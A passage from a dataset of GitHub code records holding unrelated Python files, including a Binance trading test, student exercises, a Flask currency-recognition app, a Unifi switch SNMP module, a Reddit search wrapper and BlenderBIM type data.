prev_balance = c.account[\"balances\"][1][\"free\"]\n c.order_market_sell(\"btc\",.01)\n curr_balance = c.account[\"balances\"][1][\"free\"]\n assert curr_balance < prev_balance\n\ndef test_get_price():\n b_acc = setup_acc()\n price = b_acc.get_price('BTC')\n assert isinstance(price,float)\n\ndef test_get_net_value():\n b_acc = setup_acc()\n b_acc.client._init_account(1000)\n value = b_acc.get_net_value()\n assert int(value) == 1000\n\ndef test_get_balance():\n b_acc = setup_acc()\n b_acc.client._init_account(1000)\n value = b_acc.get_balance(symbol='BTC')\n assert value == 0\n\ndef test_place_order():\n b_acc = setup_acc()\n b_acc.client._init_account(1000)\n b_acc.place_order(\"buy\",.01,'btc')\n assert b_acc.get_balance(\"btc\") == .01\n\ndef test_place_order_1():\n b_acc = setup_acc()\n b_acc.client._init_account(1000)\n b_acc.place_order(\"buy\",.01,'btc')\n b_acc.place_order(\"sell\",.01,'btc')\n assert b_acc.get_balance(\"btc\") == 0\n","repo_name":"mko237/btc-auto","sub_path":"test_binance_account_btest.py","file_name":"test_binance_account_btest.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"28954161306","text":"#--------------------------------------------------------------------------------\n# G e n e r a l I n f o r m a t i o n\n#--------------------------------------------------------------------------------\n# Name: Exercise 4.1\n#\n# Usage: python \"Exercise 4.1.py\"\n#\n# Description: Calculates the factorial for a user-given number.\n#\n# Inputs: User input - number to calculate factorial for.\n#\n# Outputs: Console data - factorial for given number.\n#\n# Auxiliary Files: None\n#\n# Special Instructions: None\n#\n#--------------------------------------------------------------------------------\n# C o d e H i s t o r y\n#--------------------------------------------------------------------------------\n# Version: 1.0\n#\n# Author(s): Kole Frazier\n#\n#--------------------------------------------------------------------------------\n# --- Exercise 4.1 ---\n#\n# ----- EXERCISE ANSWERS -----\n# When increasing the number to a very large number, the program starts hitting the limits of computer precision.\n# More specifically with the floating point interpretation, an input of 200 makes the result larger than what Python can handle\n# in floating point math, so Python returns \"infinite\"/\"inf\" in place of an actual value.\n\n#Calculate the factorial using integers numbers.\ndef FactorialInt(number):\n FinalValue = int(number)\n for n in range((number-1), 1, -1):\n FinalValue *= int(n)\n #print('DBG: n={0} && FinalValue={1}'.format(n, FinalValue))\n \n return FinalValue\n\n#Calculate the factorial using floating point numbers.\ndef FactorialFloat(number):\n FinalValue = float(number)\n for n in range((number-1), 1, -1):\n FinalValue *= float(n)\n #print('DBG: n={0} && FinalValue={1}'.format(n, FinalValue))\n \n return FinalValue\n\n#Get user input, raw - not casted to float or int.\nInput = input('Enter a number to calculate a factorial for: ')\n\n#Get factorial for input as an int and float.\nprint('Factorial for int({0}) is: {1}'.format(int(Input), FactorialInt(Input)))\nprint('Factorial for float({0}) is: {1}'.format(float(Input), FactorialFloat(Input)))","repo_name":"kolefrazier/PHYS2300-Assignments","sub_path":"Assignments/Assignment 4/Exercise 4.1.py","file_name":"Exercise 4.1.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13024363203","text":"\"\"\"\nFile Organization\n\"\"\"\n\n# The dict \"files\" below contains file names and the name of the person who owns each file. Write and call a function to reorganize \"files\" such that it contains each person's name and the files he/she owns. Assign the resultant dict to a new dict called \"grouped_by_owner\". Print out the key value pairs in this format - key: value.\n\n# Function name should be: group_by_owners\n# Dict of results should be named: files_by_owner\n\nfiles = {\n 'Input1.txt': 'Beau',\n 'Code1.py': 'Mischa',\n 'Output1.txt': 'Beau',\n 'Input2.txt': 'Beau',\n 'Code2.py': 'Mischa',\n 'Output2.txt': 'Beau',\n 'Input3.txt': 'Percy',\n 'Code3.py': 'Alejandra',\n 'Output3.txt': 'Percy'\n}\n\n\n","repo_name":"mottaquikarim/pydev-psets","sub_path":"pset_functions/data_manipulation/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"} +{"seq_id":"18944921385","text":"from parsel import Selector\nimport requests\nfrom pymongo import MongoClient\n\n\nclient = MongoClient(\"mongodb://127.0.0.1:27017/\")\n\ndefault_url = \"http://books.toscrape.com\"\nresponse = requests.get(default_url)\nselector = Selector(text=response.text)\nnext_page_url = selector.css('.pager .next a::attr(href)').get()\n\n\n\nwhile next_page_url:\n response = requests.get(default_url + next_page_url)\n titles = selector.css('.product_pod h3 a::attr(title)').getall()\n prices = selector.css('.product_price .price_color::text').getall()\n\nprint(titles)","repo_name":"Lucas-GSS/trybe-exercises","sub_path":"ciencia-da-computacao/redes-raspagem-de-dados/dia-2-raspagem-de-dados/fixacao/example_scrape.py","file_name":"example_scrape.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"12602616839","text":"from django.core import exceptions\nfrom rest_framework import serializers\n\nfrom restapi import models\n\n\nclass RecipeSerializer(serializers.ModelSerializer):\n is_favorite = serializers.SerializerMethodField(read_only=True, default=False)\n\n class Meta:\n model = models.Recipe\n fields = ['id', 'name', 'description', 'duration', 'portion', 'pictures', 'total_iron', 'is_favorite',\n 'ingredients']\n extra_kwargs = {\n 'pictures': {\n 'read_only': True\n }\n }\n\n def get_is_favorite(self, recipe):\n user = self.context['request'].user\n try:\n user_recipes = models.UserRecipe.objects.get(user=user, recipe=recipe)\n except exceptions.ObjectDoesNotExist:\n return False\n else:\n if recipe.id == user_recipes.recipe.id:\n return True\n return False\n","repo_name":"biancadinu/licenta-backend","sub_path":"backend/restapi/serializers/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"73530088548","text":"import os\r\nimport sys\r\nimport cv2\r\n\r\n# Flask\r\nfrom flask import Flask, redirect, url_for, request, render_template, Response, jsonify, redirect\r\nfrom werkzeug.utils import secure_filename\r\nfrom gevent.pywsgi import WSGIServer\r\n\r\n# TensorFlow and tf.keras\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\nfrom keras.applications.imagenet_utils import preprocess_input, decode_predictions\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing import image\r\n\r\n# Some utilites\r\nimport numpy as np\r\nfrom util import base64_to_pil\r\n\r\n\r\n# Declare a flask app\r\napp = Flask(__name__)\r\n\r\n\r\nprint('Model loaded. Check http://127.0.0.1:5000/')\r\n\r\n\r\n# Model saved with Keras model.save()\r\nMODEL_PATH = 'models/TEST-CNN.h5'\r\n\r\n# Load your own trained model\r\n#model = tf.keras.models.load_model(MODEL_PATH)\r\n#model._make_predict_function() # Necessary\r\n#print('Model loaded. Start serving...')\r\n\r\n\r\ndef prepare(file_path):\r\n print(\"..........................file path \")\r\n print(file_path)\r\n IMGSIZE = 100\r\n Img_array = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE)/255\r\n new_array = cv2.resize(Img_array, (IMGSIZE, IMGSIZE))\r\n\r\n return new_array.reshape(-1, IMGSIZE, IMGSIZE, 1)\r\n\r\n\r\n\r\n\r\ndef model_predict(img, model):\r\n img = img.resize((100, 100))\r\n\r\n # Preprocessing the image\r\n x = image.img_to_array(img)\r\n # x = np.true_divide(x, 255)\r\n x = np.expand_dims(x, axis=0)\r\n\r\n # Be careful how your trained model deals with the input\r\n # otherwise, it won't make correct prediction!\r\n x = preprocess_input(x, mode='tf')\r\n print('###################################')\r\n print(x)\r\n\r\n preds = model.predict(x)\r\n return preds\r\n\r\n\r\n@app.route('/', methods=['GET'])\r\ndef index():\r\n # Main page\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef predict():\r\n if request.method == 'POST':\r\n # Get the image from post request\r\n img = base64_to_pil(request.json)\r\n\r\n print(img)\r\n\r\n # Save the image to ./uploads\r\n img.save(\"./uploads/image.jpeg\")\r\n\r\n MODEL_PATH = 'models/TEST-CNN.h5'\r\n\r\n # Load your own trained model\r\n model = tf.keras.models.load_model(MODEL_PATH)\r\n testing = model.predict([prepare('./uploads/image.jpeg')])\r\n print('testing........................................................')\r\n print(testing)\r\n result = \"Undefined\"\r\n\r\n CATEGORIES = [\"Dollar\", \"Pound\"]\r\n print([float(testing[0][0])])\r\n print([float(testing[0][1])])\r\n print(CATEGORIES[int(testing[0][0])])\r\n\r\n if float(testing[0][0]) > 0.95:\r\n print(\"One Dollar\")\r\n result =\"One Dollar\"\r\n\r\n elif float(testing[0][0]) < 0.95 and float(testing[0][1]) < 0.05:\r\n print(\"Not Defined\")\r\n result = \"Not Defined\"\r\n\r\n else:\r\n print(\"five Pounds\")\r\n result =\" Five Pounds\"\r\n\r\n pred_proba = \"{:.3f}\".format(np.amax(testing)) # Max probability\r\n\r\n # Serialize the result, you can add additional fields\r\n return jsonify(result=result, probability=pred_proba)\r\n\r\n return None\r\n\r\n\r\nif __name__ == '__main__':\r\n # app.run(port=5002, threaded=False)\r\n\r\n # Serve the app with gevent\r\n http_server = WSGIServer(('0.0.0.0', 5000), app)\r\n http_server.serve_forever()\r\n","repo_name":"charu11/currency-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"858929563","text":"def torreXadrez():\n linha = int(input('Digite a linha: '))\n coluna = int(input('Digite a coluna: '))\n\n #posições na mesma linha\n for i in range(1,9):\n if i != coluna:\n print(f'({linha},{i})',end=',')\n\n #posições na mesma coluna\n for i in range(1,9):\n if i != linha:\n print(f'({i},{coluna})',end=',')\n \n print()\ntorreXadrez()\n ","repo_name":"Vitimfm/Python-Mini-Projects","sub_path":"FUP/Algorithms/Repetição/Questão-20.py","file_name":"Questão-20.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"32649486943","text":"n=int(input()) #컴퓨터 수(노드)\nm=int(input()) #연결 수(간선)\nedges=[[0]*(n+1) for _ in range(n+1)]\nfor i in range(m):\n edge=list(map(int,input().split()))\n edges[edge[0]][edge[1]]=1\n edges[edge[1]][edge[0]]=1\n\ndef bfs(node):\n visited=[node]\n queue=[node]\n while queue:\n cur_node=queue.pop(0)\n for next_node in range(n+1):\n if edges[cur_node][next_node]==1 and (next_node not in visited):\n visited.append(next_node)\n queue.append(next_node)\n return visited\n\nprint(len(bfs(1))-1)\n","repo_name":"askges20/baekjoon_code","sub_path":"DFS와 BFS/2606번 바이러스.py","file_name":"2606번 바이러스.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"5781059468","text":"class Processor:\r\n def __init__(self, cores_amount, frequency, cash_size):\r\n self.cores_amount = cores_amount\r\n self.frequency = frequency\r\n self.cash_size = cash_size\r\n\r\nclass Graph_processor:\r\n def __init__(self, frequency, video_memory_size):\r\n self.frequency = frequency\r\n self.video_memory_size = video_memory_size\r\n\r\nclass HDD:\r\n def __init__(self, motor_velocity, memory_size):\r\n self.motor_velocity = motor_velocity\r\n self.memory_size = memory_size\r\n\r\nclass Mother_board:\r\n def __init__(self, socket, chipset, front_side_bus):\r\n self.socket = socket\r\n self.chipset = chipset\r\n self.front_side_bus = front_side_bus\r\n\r\nclass Battery:\r\n def __init__(self, capacity, material_type, power):\r\n self.capacity = capacity\r\n self.material_type = material_type\r\n self.power = power\r\n\r\nclass Case:\r\n def __init__(self, colour, material, hightness, lenght_horizontal, lenght_vertical):\r\n self.colour = colour\r\n self.material = material\r\n self.hightness = hightness\r\n self.lenght_horizontal = lenght_horizontal\r\n self.lenght_vertical = lenght_vertical\r\n\r\nclass Display:\r\n def __init__(self, diagonal, matrix_type, density):\r\n self.diagonal = diagonal\r\n self.matrix_type = matrix_type\r\n self.density = density\r\n\r\nclass Keyboard:\r\n def __init__(self, key_travel, keyboard_type):\r\n self.key_travel = key_travel\r\n self.keyboard_type = keyboard_type\r\n\r\nclass Info:\r\n def __init__(self, firm, seller, serial_number, description):\r\n self.firm = firm\r\n self.seller = seller\r\n self.serial_number = serial_number\r\n self.description = description\r\n\r\n\r\n#-----------------------------------------------------------------------------------\r\n\r\nclass Notebook:\r\n def __init__(self, processor, graph_processor, hdd, mother_board, battery, case, display, keyboard, info):\r\n self.processor = processor\r\n self.graph_processor = graph_processor\r\n self.hdd = hdd\r\n self.mother_board = mother_board\r\n self.battery = battery\r\n self.case = case\r\n self.display = display\r\n self.keyboard = keyboard\r\n self.info = info\r\n\r\nasus = Notebook(processor = Processor(cores_amount=2, frequency=4.5, cash_size=50),\r\n graph_processor = Graph_processor(frequency=1.2, video_memory_size=2),\r\n hdd = HDD(motor_velocity=7600, memory_size=960),\r\n mother_board = Mother_board(socket=\"AM4\", chipset=\"H110\", front_side_bus=256),\r\n battery = Battery(capacity=2600, material_type=\"li-on\", power=80),\r\n case = Case(colour=\"black\", material=\"aluminium, plastic\", hightness=3, lenght_horizontal=40, lenght_vertical=25),\r\n display = Display(diagonal=15.6, matrix_type=\"TS\", density=\"1280x720\"),\r\n keyboard = Keyboard(key_travel=0.4, keyboard_type=\"membran\"),\r\n info = Info(firm=\"ASUS\", seller=\"Rozetka\", serial_number=\"C12353MN\", description=\"Best notebook for 300 hohlo-baksiv\"))\r\n\r\n\r\n","repo_name":"OneGraund/test","sub_path":"04_12/06_12.py","file_name":"06_12.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71217117670","text":"\"\"\"Ubiquiti Unifi Switch with it's messy snmp walk behavior\"\"\"\n__author__ = \"Zacharias El Banna\"\n__type__ = \"network\"\n__icon__ = \"viz-ex.png\"\n__oid__ = 8072\n\nfrom rims.devices.generic import Device as GenericDevice\nfrom rims.core.common import Session, VarList\n\nclass Device(GenericDevice):\n\n def __init__(self, aRT, aID, aIP = None):\n GenericDevice.__init__(self, aRT, aID, aIP)\n\n # Name decoding according to how LLDP sees 'this' machine\n def name_decode(self, aName):\n name = aName.split()\n if name[0] == 'Slot:':\n return \"%s/%s\"%(name[1],name[3])\n elif name[0] == 'Switch':\n return \"Port %s\"%(name[4])\n elif name[0] == 'CPU' and name[3] == 'Slot:':\n return \"irb\"\n else:\n return ' '.join(name)\n\n def interfaces(self):\n interfaces = {}\n try:\n session = Session(Version = 2, DestHost = self._ip, Community = self._rt.config['snmp']['read'], UseNumeric = 1, Timeout = int(self._rt.config['snmp'].get('timeout',100000)), Retries = 2)\n macs = VarList('.1.3.6.1.2.1.2.2.1.6')\n session.walk(macs)\n for mac in macs:\n entry = VarList('.1.3.6.1.2.1.2.2.1.2.%s'%mac.iid,'.1.3.6.1.2.1.2.2.1.8.%s'%mac.iid,'.1.3.6.1.2.1.31.1.1.1.18.%s'%mac.iid)\n session.get(entry)\n interfaces[int(mac.iid)] = {'mac':':'.join(\"%s%s\"%x for x in zip(*[iter(mac.val.hex())]*2)).upper() if mac.val else \"00:00:00:00:00:00\", 'name':self.name_decode(entry[0].val.decode()),'state':'up' if entry[1].val.decode() == '1' else 'down','description':entry[2].val.decode() if entry[2].val.decode() != \"\" else \"None\"}\n except: pass\n return interfaces\n\n def interface(self, aIndex):\n try:\n session = Session(Version = 2, DestHost = self._ip, Community = self._rt.config['snmp']['read'], UseNumeric = 1, Timeout = int(self._rt.config['snmp'].get('timeout',100000)), Retries = 2)\n entry = VarList('.1.3.6.1.2.1.2.2.1.2.%s'%aIndex,'.1.3.6.1.2.1.31.1.1.1.18.%s'%aIndex,'.1.3.6.1.2.1.2.2.1.6.%s'%aIndex)\n session.get(entry)\n except Exception as e:\n ret = {'status':'NOT_OK','info':repr(e)}\n else:\n ret = {'status':'OK','data':{'mac':':'.join(\"%s%s\"%x for x in zip(*[iter(entry[2].val.hex())]*2)).upper() if entry[2].val else \"00:00:00:00:00:00\", 'name':self.name_decode(entry[0].val.decode()), 'description':entry[1].val.decode() if entry[1].val.decode() != \"\" else \"None\"}}\n return ret\n","repo_name":"zelbanna/rims","sub_path":"devices/unifi_switch.py","file_name":"unifi_switch.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30242321424","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#Importar librerias necesarias para el funcionamiento de Python\nimport sqlite3\nimport pandas as pd\n\n# Crear conexion SQL desde python a la BD del ejercicio\ncon = sqlite3.connect(\"database.sqlite\")\ncur = con.cursor()\n\n# Cargar resultados de la SQL Query al Data Frame best_player en python, la query esta generada en base a un JOIN ON.\ncon = sqlite3.connect(\"database.sqlite\")\ndf_best_player = pd.read_sql_query(\"SELECT player_name, birthday, height, weight, overall_rating, potential, preferred_foot, attacking_work_rate, defensive_work_rate, ball_control, positioning, stamina, strength, dribbling, vision, aggression FROM player INNER JOIN Player_Attributes on player.player_api_id = player_attributes.player_api_id\", con)\n#Formatear Cabeceras de listado\ndf_best_player.columns = ['PLAYER NAME','BIRTHDAY','HEIGHT','WEIGHT','OVERALL_RATING',\n 'POTENTIAL','PREFERRED_FOOT','ATTACKING_WORK_RATE','DEFENSIVE_WORK_RATE','BALL_CONTROL','POSITIONING','STAMINA','STRENGTH','DRIBBLING','VISION','AGGRESSION']\n \ndf_best_player.info()\ndf_best_player.head()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"RAGBouch94/Challenge-T-cnico","sub_path":"4.Detalle Jugadores_DataFrame.py","file_name":"4.Detalle Jugadores_DataFrame.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"33709448978","text":"a=[2,6,22,2,2,2,2,2,21,6,3,2,8,2,1]\n#a=[4,7,4,4,7,4,4,9,4,3]\ncount=0\nfor i in a:\n if count==0:\n candidate=i\n count=1\n continue\n else:\n if candidate==i:\n count+=1\n else:\n count-=1\n\nif count==0:\n exit(0)\n\ncount=0\n\nfor i in a:\n if i==candidate:\n count+=1\n\nif count>=len(a)//2:\n print(candidate)\nelse:\n exit(0)","repo_name":"sauravgupta2800/MyCodingPractice","sub_path":"ideserve/majority_element_in_array.py","file_name":"majority_element_in_array.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27381336961","text":"import logging\nfrom flask import Flask, request, Response\nfrom calculation.calculation import resolve_calculation\n\nlogger = logging.getLogger(__name__)\n\napp = Flask(__name__)\n\n@app.route(\"/calculate\", methods=[\"GET\"])\ndef calculate():\n notation = request.args.get('notation', 'prefix')\n calculation = request.args.get('calculation')\n if calculation is None:\n return 'No calculation specified', 400\n try:\n return str(resolve_calculation(calculation, notation=notation))\n except Exception as e:\n logger.warning(\n f'Calculation request for {calculation} failed with \"{e}\"'\n )\n return 'Calculation Error', 400\n","repo_name":"capable-dragonfly/kheiron-technical-challenge","sub_path":"service/calculator_service.py","file_name":"calculator_service.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"8131487142","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.parent = None\n\n\"\"\"\n implement insert, delete, find next, find prev\n find min and find max \n source: https://www.techiedelight.com/inorder-tree-traversal-iterative-recursive/\n\"\"\"\n\n\n\ndef findMaxIter(root):\n while True:\n if root.right == None:\n return root.data\n else:\n root = root.right\n\ndef findMinIter(root):\n while True:\n if root.left == None:\n return root.data\n else:\n root = root.left\n\n\ndef findNext(root, n):\n #in order traversal\n\n minNum = findMinIter(root)\n maxNum = findMaxIter(root)\n\n if (n == minNum or n == maxNum):\n return -1\n\n while True:\n if root.right == None:\n return root.data\n else:\n root = root.right\n\n # return arr[arr.index(n) + 1]\n\ndef findPrev(root, n):\n #in order traversal\n minNum = findMinIter(root)\n maxNum = findMaxIter(root)\n\n if (n == minNum or n == maxNum):\n return -1\n\n while True:\n if root.left == None:\n return root.parent.data\n else:\n root = root.left\n\n\ndef insertIter(root, num):\n if root == None: \n root = num\n else:\n while True:\n if root.data < num.data:\n if root.right == None:\n root.right = num\n root.right.parent = root\n break\n else:\n root = root.right\n elif root.data > num.data:\n if root.left == None:\n root.left = num\n root.left.parent = root\n break\n else:\n root = root.left\n\ndef inOrder(n):\n if n:\n inOrder(n.left)\n print(n.data, end = \" \")\n inOrder(n.right)\n\n\ndef deleteRec(root, num):\n while True:\n if root == None:\n return root\n elif (num < root.data):\n root = root.left\n \n elif (num > root.data):\n root = root.right \n else:\n if (root.left == None and root.right == None):\n root = None\n return root\n elif (root.left == None):\n temp = root.right\n root = None\n return temp\n elif (root.right == None):\n temp = root.left\n root = None\n return temp\n else:\n temp = findMinIter(root)\n root.data = temp\n num = temp\n root = root.right \n return root\n\nn = Node(21)\ninsertIter(n, Node(12))\ninsertIter(n, Node(30))\ninsertIter(n, Node(112))\n\ninOrder(n)\nprint()\nprint(\"max\", findMaxIter(n))\nprint(\"min\", findMinIter(n))\n\nprint(\"next 30\", findNext(n, 30))\nprint(\"prev 30\", findPrev(n, 30))\n\nprint(\"delete 30\")\nn = deleteRec(n, 30)\ninOrder(n)\nprint()\n","repo_name":"jonebdev/AVLtree","sub_path":"part1/problem1d.py","file_name":"problem1d.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"42037796757","text":"import time\nimport os\nfrom typing import Generator\nimport requests\nimport loguru\n\nREDDIT_RATE_LIMIT = 2 # seconds\nMAX_QUERY_LENGTH = 512\nMAX_LISTING_LIMIT = 100\nBASE_URL = \"https://reddit.com\"\n\n\nclass RedditWrapper:\n \"\"\"\n Wrapper for very basic search API interaction\n \"\"\"\n\n user_agent=f\"Ubuntu(20.04):test-app:v0.1\"\n \n def generate_searches(\n self, \n search_term: str,\n subreddit: str = None,\n period: str = None,\n limit: int = None,\n sort: str = None\n ) -> Generator[dict, None, None]:\n \"\"\"\n Generate a stream of \n [listing](https://www.reddit.com/dev/api#listings) objects\n that match a given search term.\n\n Each time next() is called on the generator returned from\n this method, this componenta will search for an updated list\n of listings. If there is no update then the same list as before is \n returned.\n \"\"\"\n #defaults - not in func args to allow for defaultdict in sse\n period = \"hour\" if not period else period\n limit = 5 if not limit else limit\n sort = \"new\" if not sort else sort\n\n subredlnk = f\"r/{subreddit}\" if subreddit else \"\"\n url = f\"{BASE_URL}/{subredlnk}/search.json\"\n q = search_term\n if len(search_term) > MAX_QUERY_LENGTH:\n raise ValueError(\n f\"Search term is too long - reduce to {MAX_QUERY_LENGTH}\"\n \" characters.\"\n )\n t = period\n limit = limit\n headers = {\"User-Agent\": self.user_agent}\n params = {\n \"q\": q,\n \"t\": t,\n \"limit\": limit,\n \"sort\": sort\n }\n last_called_time = time.time()\n while True:\n while time.time() - last_called_time < REDDIT_RATE_LIMIT:\n time.sleep(REDDIT_RATE_LIMIT - (time.time() - last_called_time))\n last_called_time = time.time()\n r = requests.get(\n url,\n headers=headers,\n params=params\n )\n api_ret = r.json()\n \n yield api_ret['data']['children']","repo_name":"nicelgueta/e3-utils","sub_path":"e3utils/cnxns/reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"32147048649","text":"import os\nimport hashlib\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = \n# Simulation Scripts\n# = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = \ndef compute_trajectories(AEi, init_values, Tmax=1000):\n qtrajs = []; fprs = []\n lenq = len(init_values)\n for qi, q0 in enumerate(init_values):\n print('\\r ', np.round(qi/lenq, 4), end='')\n q = q0.copy()\n \n qtraj, fpr = AEi.compute_trajectory(q, Tmax=Tmax,\n tolerance=10e-4, EpsMin=10e-4)\n \n qtrajs.append( qtraj )\n fprs.append( fpr )\n\n print()\n print('Computed', len(qtrajs), 'trajectories')\n \n return qtrajs, fprs\n\ndef check_run(qtrajs, fprs=None):\n if fprs is not None:\n print('Unique fixed points reached:', np.unique(fprs))\n plt.hist([len(traj) for traj in qtrajs], bins=20);\n plt.title('Histrogram of trajectories lengths')\n\n\n\ndef obtain_simdata(AEi, init_values, verbose=1, Tmax=1000):\n fn = 'data/' + AEi.id()\n fn += '_' + str(_transform_tensor_into_hash(init_values))\n fn += '.npz'\n \n try:\n dat = np.load(fn, allow_pickle=True)\n ddic = dict(zip((k for k in dat), (dat[k] for k in dat)))\n print(\"Loading \", fn) if verbose else None\n \n except:\n print(\"Computing \", fn) if verbose else None\n qtrajs, fprs = compute_trajectories(AEi, init_values, Tmax=Tmax)\n check_run(qtrajs, fprs)\n # rtrajs = obtain_rewards(AEi, πtrajs)\n \n ddic = dict(qtrajs=qtrajs, fprs=fprs)\n np.savez_compressed(fn, **ddic)\n dat = np.load(fn, allow_pickle=True)\n ddic = dict(zip((k for k in dat), (dat[k] for k in dat)))\n \n return ddic\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n# helpers for the helpers\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ndef _transform_tensor_into_hash(tens):\n \"\"\"Transform tens into a string for filename saving\"\"\"\n r = int(hashlib.sha512(str(tens).encode('utf-8')).hexdigest()[:16], 16)\n return r\n\ndef _refine_datafolder(datafolder):\n \"\"\"Check and refine datafolder path\"\"\"\n df = os.path.expanduser(datafolder)\n df += '/' if df[-1] != '/' else '' # make sure path ends as folders do\n return df","repo_name":"wbarfuss/intrinsic-fluctuations-cooperation","sub_path":"2_Learnability/aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"23923161823","text":"import bpy\nimport ifcopenshell.util.type\nimport ifcopenshell.util.element\nfrom ifcopenshell.util.doc import get_entity_doc\nimport blenderbim.tool as tool\n\n\ndef refresh():\n TypeData.is_loaded = False\n\n\nclass TypeData:\n data = {}\n is_loaded = False\n\n @classmethod\n def load(cls):\n cls.is_loaded = True\n # These two are loaded discretely because relating_types depends on relating_type_classes\n cls.data[\"relating_type_classes\"] = cls.relating_type_classes()\n cls.data[\"relating_types\"] = cls.relating_types()\n cls.data.update(\n {\n \"is_product\": cls.is_product(),\n \"total_instances\": cls.total_instances(),\n \"relating_type\": cls.relating_type(),\n }\n )\n\n @classmethod\n def relating_type_classes(cls):\n results = []\n obj = bpy.context.active_object\n if not obj:\n return\n element = tool.Ifc.get_entity(obj)\n if not element:\n return []\n version = tool.Ifc.get_schema()\n types = ifcopenshell.util.type.get_applicable_types(element.is_a(), schema=version)\n if element.is_a(\"IfcAnnotation\"):\n types.append(\"IfcTypeProduct\")\n results.extend((t, t, get_entity_doc(version, t).get(\"description\", \"\")) for t in types)\n return results\n\n @classmethod\n def relating_types(cls):\n relating_type_classes = cls.relating_type_classes()\n if not relating_type_classes:\n return []\n results = []\n relating_type_class = bpy.context.active_object.BIMTypeProperties.relating_type_class\n if not relating_type_class and relating_type_classes:\n relating_type_class = relating_type_classes[0][0]\n elements = tool.Ifc.get().by_type(relating_type_class)\n elements = [(str(e.id()), e.Name or \"Unnamed\", \"\") for e in elements]\n results.extend(sorted(elements, key=lambda s: s[1]))\n return results\n\n @classmethod\n def is_product(cls):\n element = tool.Ifc.get_entity(bpy.context.active_object)\n return element.is_a(\"IfcProduct\")\n\n @classmethod\n def total_instances(cls):\n element = tool.Ifc.get_entity(bpy.context.active_object)\n return str(len(ifcopenshell.util.element.get_types(element)))\n\n @classmethod\n def relating_type(cls):\n element = tool.Ifc.get_entity(bpy.context.active_object)\n element_type = ifcopenshell.util.element.get_type(element)\n if element_type:\n return {\"id\": element_type.id(), \"name\": f\"{element_type.is_a()}/{element_type.Name or 'Unnamed'}\"}\n","repo_name":"IfcOpenShell/IfcOpenShell","sub_path":"src/blenderbim/blenderbim/bim/module/type/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":1412,"dataset":"github-code","pt":"71"} +{"seq_id":"11716867089","text":"import pygame\nfrom pygame.locals import *\nfrom rt import RayTracer\nfrom figures import *\nfrom lights import *\nfrom materials import *\nfrom math import*\n\nwidth = 1500\nheight = 650\npygame.init()\nscreen = pygame.display.set_mode((width, height), pygame.DOUBLEBUF | pygame.HWACCEL | pygame.HWSURFACE)\nscreen.set_alpha(None)\n\nraytracer = RayTracer(screen)\nraytracer.envMap = pygame.image.load(\"cielo.png\")\nraytracer.rtClearColor(0.25, 0.25, 0.25)\n\nbrick = Material(diffuse=(0, 0, 1), spec=8, Ks=0.01, matType=TRANSPARENT)\n\ngrass = Material(diffuse=(0.4, 1, 0.4), spec=32, Ks=0.1,matType=REFLECTIVE)\npiel = Material(diffuse=(157/255, 126/255, 61/255), spec=256, Ks=0.2, matType=OPAQUE)\n\nwhite_opaque = Material(diffuse=(1, 1, 1), spec=256, Ks=0.2, matType=OPAQUE)\nboxTexture=pygame.image.load(\"ros.jpg\")\nbox=Material(texture=boxTexture)\nmirror = Material(diffuse=(0.9, 0.9, 0.9), spec=64, 